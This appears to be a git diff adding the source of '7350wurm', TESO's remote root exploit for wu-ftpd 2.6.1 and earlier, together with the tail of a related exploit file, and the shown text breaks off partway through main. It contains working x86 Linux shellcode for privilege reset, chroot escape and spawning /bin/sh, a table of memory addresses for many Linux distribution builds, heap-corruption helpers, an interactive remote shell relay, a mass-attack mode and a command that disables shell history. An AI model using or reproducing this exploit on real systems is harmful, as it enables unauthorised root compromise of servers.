+        ADDR_STORE (&cspace[12], tgt->retaddr);         /* bk */ 
+        return;
+}
+void
+shell (int sock)
+{
+        int     l;
+        char    buf[512];
+        fd_set  rfds;
+        while (1) {
+                FD_SET (0, &rfds);
+                FD_SET (sock, &rfds);
+                select (sock + 1, &rfds, NULL, NULL, NULL);
+                if (FD_ISSET (0, &rfds)) {
+                        l = read (0, buf, sizeof (buf));
+                        if (l <= 0) {
+                                perror ("read user");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (sock, buf, l);
+                }
+                if (FD_ISSET (sock, &rfds)) {
+                        l = read (sock, buf, sizeof (buf));
+                        if (l == 0) {
+                                printf ("connection closed by foreign host.\n");
+                                exit (EXIT_FAILURE);
+                        } else if (l < 0) {
+                                perror ("read remote");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (1, buf, l);
+                }
+        }
+}
+/*** FTP functions
+ */
+/* FTP is TELNET is SHIT.
+ */
+void
+ftp_escape (unsigned char *buf, unsigned long int buflen)
+{
+        unsigned char * obuf = buf;
+        for ( ; *buf != '\0' ; ++buf) {
+                if (*buf == 0xff &&
+                        (((buf - obuf) + strlen (buf) + 1) < buflen))
+                {
+                        memmove (buf + 1, buf, strlen (buf) + 1);
+                        buf += 1;
+                }
+        }
+}
+void
+ftp_recv_until (int sock, char *buff, int len, char *begin)
+{
+        char    dbuff[2048];
+        if (buff == NULL) {
+                buff = dbuff;
+                len = sizeof (dbuff);
+        }
+        do {
+                memset (buff, '\x00', len);
+                if (net_rlinet (sock, buff, len - 1, 20) <= 0)
+                        return;
+        } while (memcmp (buff, begin, strlen (begin)) != 0);
+        return;
+}
+int
+ftp_login (char *host, char *user, char *pass)
+{
+        int     ftpsock;
+        char    resp[512];
+        ftpsock = net_connect (NULL, host, 21, 30);
+        if (ftpsock <= 0)
+                return (0);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline pre-login stuff (rfc violation !)
+         */
+        if (memcmp (resp, "220-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
+        if (memcmp (resp, "220 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        ftp_banner = strdup (resp);
+        net_write (ftpsock, "USER %s\n", user);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        if (memcmp (resp, "331 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        net_write (ftpsock, "PASS %s\n", pass);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline responses from ftp servers
+         */
+        if (memcmp (resp, "230-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
+        if (memcmp (resp, "230 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        return (ftpsock);
+flerr:
+        if (ftpsock > 0)
+                close (ftpsock);
+        return (0);
+}
+/* ripped from zodiac */
+void
+hexdump (char *desc, unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        printf ("/* %s, %u bytes */\n", desc, amount);
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (stderr, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        fprintf (stderr, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (stderr, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (stderr, "%c", trans[data[dp]]);
+                        fflush (stderr);
+                        fprintf (stderr, "\n");
+                }
+                fflush (stderr);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (stderr, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (stderr, " ");
+                        fflush (stderr);
+                }
+                fprintf (stderr, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (stderr, "%c", trans[data[dp]]);
+                fflush (stderr);
+        }
+        fprintf (stderr, "\n");
+        return;
+}
+unsigned long int
+net_resolve (char *host)
+{
+        long            i;
+        struct hostent  *he;
+        i = inet_addr(host);
+        if (i == -1) {
+                he = gethostbyname(host);
+                if (he == NULL) {
+                        return (0);
+                } else {
+                        return (*(unsigned long *) he->h_addr);
+                }
+        }
+        return (i);
+}
+int
+net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec)
+{
+        int                     n,
+                                len,
+                                error,
+                                flags;
+        int                     fd;
+        struct timeval          tv;
+        fd_set                  rset, wset;
+        struct sockaddr_in      csa;
+        if (cs == NULL)
+                cs = &csa;
+        /* first allocate a socket */
+        cs->sin_family = AF_INET;
+        cs->sin_port = htons (port);
+        fd = socket (cs->sin_family, SOCK_STREAM, 0);
+        if (fd == -1)
+                return (-1);
+        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+                close (fd);
+                return (-1);
+        }
+        flags = fcntl (fd, F_GETFL, 0);
+        if (flags == -1) {
+                close (fd);
+                return (-1);
+        }
+        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1) {
+                close (fd);
+                return (-1);
+        }
+        error = 0;
+        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+        if (n < 0) {
+                if (errno != EINPROGRESS) {
+                        close (fd);
+                        return (-1);
+                }
+        }
+        if (n == 0)
+                goto done;
+        FD_ZERO(&rset);
+        FD_ZERO(&wset);
+        FD_SET(fd, &rset);
+        FD_SET(fd, &wset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        n = select(fd + 1, &rset, &wset, NULL, &tv);
+        if (n == 0) {
+                close(fd);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1)
+                return (-1);
+        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
+                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
+                        len = sizeof(error);
+                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+                                errno = ETIMEDOUT;
+                                return (-1);
+                        }
+                        if (error == 0) {
+                                goto done;
+                        } else {
+                                errno = error;
+                                return (-1);
+                        }
+                }
+        } else
+                return (-1);
+done:
+        n = fcntl(fd, F_SETFL, flags);
+        if (n == -1)
+                return (-1);
+        return (fd);
+}
+void
+net_write (int fd, const char *str, ...)
+{
+        char    tmp[1025];
+        va_list vl;
+        int     i;
+        va_start(vl, str);
+        memset(tmp, 0, sizeof(tmp));
+        i = vsnprintf(tmp, sizeof(tmp), str, vl);
+        va_end(vl);
+#ifdef DEBUG
+        printf ("[snd] %s%s", tmp, (tmp[strlen (tmp) - 1] == '\n') ? "" : "\n");
+#endif
+        send(fd, tmp, i, 0);
+        return;
+}
+int
+net_rlinet (int fd, char *buf, int bufsize, int sec)
+{
+        int                     n;
+        unsigned long int       rb = 0;
+        struct timeval          tv_start, tv_cur;
+        memset(buf, '\0', bufsize);
+        (void) gettimeofday(&tv_start, NULL);
+        do {
+                (void) gettimeofday(&tv_cur, NULL);
+                if (sec > 0) {
+                        if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
+                                ((tv_start.tv_sec * 1000000) +
+                                (tv_start.tv_usec))) > (sec * 1000000))
+                        {
+                                return (-1);
+                        }
+                }
+                n = net_rtimeout(fd, NET_READTIMEOUT);
+                if (n <= 0) {
+                        return (-1);
+                }
+                n = read(fd, buf, 1);
+                if (n <= 0) {
+                        return (n);
+                }
+                rb++;
+                if (*buf == '\n')
+                        return (rb);
+                buf++;
+                if (rb >= bufsize)
+                        return (-2);    /* buffer full */
+        } while (1);
+}
+int
+net_rtimeout (int fd, int sec)
+{
+        fd_set          rset;
+        struct timeval  tv;
+        int             n, error, flags;
+        error = 0;
+        flags = fcntl(fd, F_GETFL, 0);
+        n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1)
+                return (-1);
+        FD_ZERO(&rset);
+        FD_SET(fd, &rset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        /* now we wait until more data is received then the tcp low level
+         * watermark, which should be setted to 1 in this case (1 is default)
+         */
+        n = select(fd + 1, &rset, NULL, NULL, &tv);
+        if (n == 0) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1) {
+                return (-1);
+        }
+        /* socket readable ? */
+        if (FD_ISSET(fd, &rset)) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                return (1);
+        } else {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+}
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
diff --git a/exploits/7350wurm/7350wurm.c b/exploits/7350wurm/7350wurm.c
new file mode 100644
index 0000000..c258dbb
--- /dev/null
+++ b/exploits/7350wurm/7350wurm.c
@@ -0,0 +1,1428 @@
+/* 7350wurm - x86/linux wu-ftpd remote root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za website and any public exploit archive.
+ *
+ * The distribution restrictions cover the entire file, including this
+ * header notice. (This means, you are not allowed to reproduce the header).
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * thanks to bnuts, tomas, dvorak, scrippie and maxx for hints, discussions
+ * and ideas (synnergy.net rocks, thank you buddies ! :).
+ */
+#define VERSION "0.3.0"
+/* TODO 1. fix chroot break on linux 2.4.x (x >= 13?)
+ *         (ptrace inject on ppid())
+ */
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <arpa/telnet.h>
+#include <netdb.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <string.h>
+#include <time.h>
+#define INIT_CMD        "unset HISTFILE;id;uname -a;\n"
+/* shellcodes
+ */
+unsigned char   x86_lnx_loop[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\xeb\xfe";
+/* x86/linux write/read/exec code (41 bytes)
+ * does: 1. write (1, "\nsP\n", 4);
+ *       2. read (0, ncode, 0xff);
+ *       3. jmp ncode
+ */
+unsigned char   x86_wrx[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xdb\x43\xb8\x0b\x74\x51\x0b\x2d\x01\x01\x01"
+        "\x01\x50\x89\xe1\x6a\x04\x58\x89\xc2\xcd\x80\xeb"
+        "\x0e\x31\xdb\xf7\xe3\xfe\xca\x59\x6a\x03\x58\xcd"
+        "\x80\xeb\x05\xe8\xed\xff\xff\xff";
+unsigned char   x86_lnx_execve[] =
+        /* 49 byte x86 linux PIC setreuid(0,0) + chroot-break
+         * code by lorian / teso
+         */
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        /* 34 byte x86 linux argv code -sc
+         */
+        "\xeb\x1b\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
+        "\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
+        "\xe1\xb0\x0b\xcd\x80\xe8\xe0\xff\xff\xff";
+/* setreuid/chroot/execve
+ * lorian / teso */
+unsigned char   x86_lnx_shell[] =
+/* TODO: fix chroot break on 2.4.x series (somewhere between 2.4.6 and
+ *       2.4.13 they changed chroot behaviour. maybe to ptrace-inject
+ *       on parent process (inetd) and execute code there. (optional)
+ */
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
+typedef struct {
+        char *                  desc;           /* distribution */
+        char *                  banner;         /* ftp banner part */
+        unsigned char *         shellcode;
+        unsigned int            shellcode_len;
+        unsigned long int       retloc;         /* return address location */
+        unsigned long int       cbuf;           /* &cbuf[0] */
+} tgt_type;
+tgt_type tmanual = {
+        "manual values",
+        "unknown banner",
+        x86_wrx, sizeof (x86_wrx) - 1,
+        0x41414141, 0x42424242
+};
+tgt_type targets[] = {
+        { "Caldera eDesktop|eServer|OpenLinux 2.3 update "
+                "[wu-ftpd-2.6.1-13OL.i386.rpm]",
+                "Version wu-2.6.1(1) Wed Nov 28 14:03:42 CET 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806e2b0, 0x080820a0 },
+        { "Debian potato [wu-ftpd_2.6.0-3.deb]",
+                "Version wu-2.6.0(1) Tue Nov 30 19:12:53 CET 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806db00, 0x0807f520 },
+        { "Debian potato [wu-ftpd_2.6.0-5.1.deb]",
+                "Version wu-2.6.0(1) Fri Jun 23 08:07:11 CEST 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806db80, 0x0807f5a0 },
+        { "Debian potato [wu-ftpd_2.6.0-5.3.deb]",
+                "Version wu-2.6.0(1) Thu Feb 8 17:45:47 CET 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806db80, 0x0807f5a0 },
+        { "Debian sid [wu-ftpd_2.6.1-5_i386.deb]",
+                "Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806e7a0, 0x0807ffe0 },
+        { "Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]",
+                "Version wu-2.6.0(1) Thu May 25 03:35:34 PDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x080713e0, 0x08082e00 },
+        { "Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]",
+                "Version wu-2.6.1(1) Mon Jan 29 08:04:31 PST 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08072bd4, 0x08086400 },
+        { "Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]",
+                "Version wu-2.6.1(1) Mon Jan 15 20:52:49 CET 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806f7f0, 0x08082600 },
+        { "Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]",
+                "Version wu-2.6.1(1) Wed Jan 10 07:07:00 CET 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08071850, 0x08084660 },
+        { "Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]",
+                "Version wu-2.6.1(1) Sun Sep 9 16:30:24 CEST 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806fec4, 0x08082b40 },
+        { "RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) "
+                        "Mon Jan 18 19:19:31 EST 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08061cf0, 0x08068540 },       /* XXX: manually found */
+        { "RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) "
+                        "Mon Aug 3 19:17:20 EDT 1998",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08061c48, 0x08068490 },       /* XXX: manually found */
+        { "RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]",
+                "Version wu-2.6.0(1) Fri Jun 23 09:22:33 EDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806b530, 0x08076550 },       /* XXX: manually found */
+#if 0
+        /* XXX: not exploitable using synnergy.net method. (glob code
+         *      does not handle {.,.,.,.}
+         */
+        { "RedHat 6.0 (Hedwig) [wu-ftpd-2.4.2vr17-3.i386.rpm]",
+                "Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08069f04, 0x08079f60 },
+#endif
+        { "RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]",
+                "Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806e620, 0x080803e0 },
+        { "RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]",
+                "Version wu-2.6.0(1) Fri Jun 23 09:17:44 EDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08070538, 0x08083360 },
+        { "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
+                "Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806cb88, 0x0807cc40 },
+        { "RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]",
+                "Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806e1a0, 0x0807fbc0 },
+        { "RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]",
+                "Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08070ddc, 0x08084600 },
+        { "RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]",
+                "Version wu-2.6.1-16",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0807314c, 0x08085de0 },
+        { "RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]",
+                "Version wu-2.6.1-18",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x08072c30, 0x08085900 },
+        { "SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]",
+                "Version wu-2.6.0(1) Wed Aug 30 22:26:16 GMT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806e6b4, 0x080800c0 },
+        { "SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) "
+                        "Wed Aug 30 22:26:37 GMT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806989c, 0x08069f80 },
+        { "SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]",
+                "Version wu-2.6.0(1) Thu Oct 28 23:35:06 GMT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806f85c, 0x08081280 },
+        { "SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]",
+                "Version wu-2.6.0(1) Mon Jun 26 13:11:34 GMT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806f4e0, 0x08080f00 },
+        { "SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) "
+                        "Mon Jun 26 13:11:56 GMT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806a234, 0x0806a880 },
+        { "SuSE 7.0 [wuftpd.rpm]",
+                "Version wu-2.6.0(1) Wed Sep 20 23:52:03 GMT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806f180, 0x08080ba0 },
+        { "SuSE 7.0 wu-2.4.2 [wuftpd.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) "
+                        "Wed Sep 20 23:52:21 GMT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806a554, 0x0806aba0 },
+        { "SuSE 7.1 [wuftpd.rpm]",
+                "Version wu-2.6.0(1) Thu Mar 1 14:43:47 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806f168, 0x08080980 },
+        { "SuSE 7.1 wu-2.4.2 [wuftpd.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) "
+                        "Thu Mar 1 14:44:08 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806a534, 0x0806ab80 },
+        { "SuSE 7.2 [wuftpd.rpm]",
+                "Version wu-2.6.0(1) Mon Jun 18 12:34:55 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806f58c, 0x08080dc0 },
+        { "SuSE 7.2 wu-2.4.2 [wuftpd.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) "
+                        "Mon Jun 18 12:35:12 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806a784, 0x0806ae40 },
+        { "SuSE 7.3 [wuftpd.rpm]",
+                "Version wu-2.6.0(1) Thu Oct 25 03:14:33 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806f31c, 0x08080aa0 },
+        { "SuSE 7.3 wu-2.4.2 [wuftpd.rpm]",
+                "Version wu-2.4.2-academ[BETA-18](1) "
+                        "Thu Oct 25 03:14:49 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806a764, 0x0806ad60 },
+#if 0
+        /* slackware (from 8 on they use proftpd by default) */
+        { "Slackware 7",
+                "Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806d03c, 0x0808f648 },
+#endif
+        { "Slackware 7.1",
+                "Version wu-2.6.0(1) Tue Jun 27 10:52:28 PDT 2000",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806ba2c, },
+        { NULL, NULL, 0, 0, 0, 0 },
+};
+/* exploitation related stuff.
+ * DO NOT CHANGE, except you know exactly what you are doing.
+ */
+#define CHUNK_POS       256
+#define MALLOC_ALIGN_MASK       0x07
+#define MALLOC_MINSIZE          0x10
+#define CHUNK_ALLSIZE(s) \
+        CHUNK_ROUND((s)) + 0x08
+#define CHUNK_ROUND(s) \
+        (((((s) + 4 + MALLOC_ALIGN_MASK)) < \
+                (MALLOC_MINSIZE + MALLOC_ALIGN_MASK)) ? \
+        (MALLOC_MINSIZE) : ((((s) + 4 + MALLOC_ALIGN_MASK)) & \
+        ~MALLOC_ALIGN_MASK))
+/* minimum sized malloc(n) allocation that will jield in an overall
+ * chunk size of s. (s must be a valid %8=0 chunksize)
+ */
+#define CHUNK_ROUNDDOWN(s) \
+        ((s) <= 0x8) ? (1) : ((s) - 0x04 - 11)
+#define CHUNK_STRROUNDDOWN(s) \
+        (CHUNK_ROUNDDOWN ((s)) > 1 ? CHUNK_ROUNDDOWN ((s)) - 1 : 1)
+/* FTP related stuff
+ */
+char *  dest = "127.0.0.1";     /* can be changed with -d */
+char *  username = "ftp";       /* can be changed with -u */
+char *  password = "mozilla@";  /* can be changed with -p */
+char *  ftp_banner = NULL;
+int     verbose = 0;
+/* FTP prototypes
+ */
+void ftp_escape (unsigned char *buf, unsigned long int buflen);
+void ftp_recv_until (int sock, char *buff, int len, char *begin);
+int ftp_login (char *host, char *user, char *pass);
+/* main prototypes
+ */
+void usage (char *progname);
+void exploit (int fd, tgt_type *tgt);
+void shell (int sock);
+void hexdump (char *desc, unsigned char *data, unsigned int amount);
+void tgt_list (void);
+tgt_type * tgt_frombanner (unsigned char *banner);
+void xp_buildsize (int fd, unsigned char this_size_ls,
+        unsigned long int csize);
+void xp_gapfill (int fd, int rnfr_num, int rnfr_size);
+int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
+void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
+/*** MASS mode stuff
+ */
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+int             mass = 0;       /* enable with -m (kids, get hurt!) */
+unsigned int    mlen = 0;
+unsigned char   mcode[256];
+/* imported from network.c
+ */
+#define NET_CONNTIMEOUT 60
+#define NET_READTIMEOUT 20
+int     net_conntimeout = NET_CONNTIMEOUT;
+unsigned long int net_resolve (char *host);
+int net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec);
+void net_write (int fd, const char *str, ...);
+int net_rtimeout (int fd, int sec);
+int net_rlinet (int fd, char *buf, int bufsize, int sec);
+/* exploitation related stuff, which is fixed on all wuftpd systems
+ */
+#define RNFR_SIZE       4
+#define RNFR_NUM        73
+int     automode = 0;   /* evil, do not use */
+int     debugmode = 0;
+void
+usage (char *progname)
+{
+        fprintf (stderr, "usage: %s [-h] [-v] [-a] [-D] [-m]\n"
+                "\t[-t <num>] [-u <user>] [-p <pass>] [-d host]\n"
+                "\t[-L <retloc>] [-A <retaddr>]\n\n", progname);
+        fprintf (stderr,
+                "-h\tthis help\n"
+                "-v\tbe verbose (default: off, twice for greater effect)\n"
+                "-a\tAUTO mode (target from banner)\n"
+                "-D\tDEBUG mode (waits for keypresses)\n"
+                "-m\tenable mass mode (use with care)\n"
+                "-t num\tchoose target (0 for list, try -v or -v -v)\n"
+                "-u user\tusername to login to FTP (default: \"ftp\")\n"
+                "-p pass\tpassword to use (default: \"mozilla@\")\n"
+                "-d dest\tIP address or fqhn to connect to "
+                        "(default: 127.0.0.1)\n"
+                "-L loc\toverride target-supplied retloc "
+                        "(format: 0xdeadbeef)\n"
+                "-A addr\toverride target-supplied retaddr "
+                        "(format: 0xcafebabe)\n");
+        fprintf (stderr, "\n");
+        exit (EXIT_FAILURE);
+}
+unsigned char *         shellcode = NULL;
+unsigned long int       shellcode_len = 0;
+unsigned long int       user_retloc = 0,
+                        user_retaddr = 0;
+int
+main (int argc, char *argv[])
+{
+        char                    c;
+        char *                  progname;       /* = argv[0] */
+        int                     fd;
+        tgt_type *              tgt = NULL;
+        int                     tgt_num = -1;
+        unsigned char           xpbuf[512 + 16];
+        fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
+                "(version "VERSION")\n"
+                "team teso (thx bnuts, tomas, synnergy.net !).\n\n");
+        progname = argv[0];
+        if (argc < 2)
+                usage (progname);
+        while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
+                switch (c) {
+                case 'h':
+                        usage (progname);
+                        break;
+                case 'a':
+                        automode = 1;
+                        break;
+                case 'D':
+                        debugmode = 1;
+                        break;
+                case 'v':
+                        verbose += 1;
+                        break;
+                case 'm':
+                        mass = 1;
+                        break;
+                case 't':
+                        if (sscanf (optarg, "%u", &tgt_num) != 1)
+                                usage (progname);
+                        break;
+                case 'u':
+                        username = optarg;
+                        printf ("username = %s\n", optarg);
+                        break;
+                case 'p':
+                        password = optarg;
+                        break;
+                case 'd':
+                        dest = optarg;
+                        break;
+                case 'L':
+                        if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
+                                usage (progname);
+                        break;
+                case 'A':
+                        if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
+                                usage (progname);
+                        break;
+                default:
+                        usage (progname);
+                        break;
+                }
+        }
+        /* if both required offsets are given manually, then we dont have
+         * to require a target selection. otherwise check whether the target
+         * is within the list. if its not, then print a list of available
+         * targets
+         */
+        if (user_retloc != 0 && user_retaddr != 0) {
+                tgt = &tmanual;
+        } else if (automode == 0 && (tgt_num == 0 ||
+                tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
+        {
+                if (tgt_num != 0)
+                        printf ("WARNING: target out of list. list:\n\n");
+                tgt_list ();
